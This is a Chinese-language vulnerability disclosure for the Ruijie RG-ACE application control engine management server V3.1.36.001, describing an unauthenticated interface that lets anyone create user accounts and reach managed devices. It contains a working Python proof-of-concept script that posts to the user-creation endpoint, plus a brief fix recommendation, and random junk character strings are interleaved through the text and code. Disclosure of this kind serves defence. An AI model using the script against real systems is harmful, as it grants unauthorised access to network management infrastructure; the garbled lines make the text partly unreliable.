锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
7 o  ]9 Q, q/ _" E

" I. W) h/ \4 d0 e$ F* v测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
& v. c6 q: q  m' B3 E% Y3 _编译时间: 201104291730
3 @9 D) X4 [; Z+ x

/ J/ @8 l4 z: H/ V漏洞证明：
; ^+ l; e- \+ _* s9 P6 `# p


1 W( t# D; p3 B0 ]

# m8 W; t% l% r3 k( |' a+ _4 c
执行脚本
#! /usr/bin/env python
  I! c1 h% X* n# ]1 p#coding=gbk
$ m- D9 ^* K; s* u#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
( j% z7 g$ g, A2 T8 d1 a1 G2 ~+ A1 Fopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
; `8 Z) v5 m) E# r# V" I4 }& j("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
- ~* S0 d& P: D2 Q3 |$ U' u("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
+ Z$ m1 ]$ I2 k3 g/ K0 ^("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

* S) Q" L7 v! N$ H- {0 Z; F登录，连接设备
$ P  ~) d$ v" G6 ~: @& s
& H" j8 s2 h' d# l
' i! O& c9 n% X# N

% N  S1 O; u/ ]0 o# M
* ^  P, z8 Y0 X# U' E  q默认的管理员admin权限更大点

5 @0 _5 B- r. l7 Y$ g

1 h3 O4 D) x9 J

修复方案：
加强对接口的权限验证